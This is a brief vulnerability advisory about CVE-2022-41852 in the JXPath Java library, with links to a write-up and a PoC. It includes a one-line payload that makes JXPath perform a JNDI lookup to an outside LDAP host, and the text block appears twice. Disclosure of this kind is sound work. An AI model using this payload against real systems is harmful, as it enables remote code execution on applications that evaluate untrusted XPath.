Those using JXPath to interpret untrusted XPath expressions may be vulnerable to a remote code execution attack. All JXPathContext class functions processing a XPath string are vulnerable except compile() and compilePath() function. The XPath expression can be used by an attacker to load any Java class from the classpath resulting in code execution.
Read more here:
https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/
Payload:
jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");
PoC:
https://github.com/Warxim/CVE-2022-41852
Read more here:
https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/
Payload:
jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");
PoC:
https://github.com/Warxim/CVE-2022-41852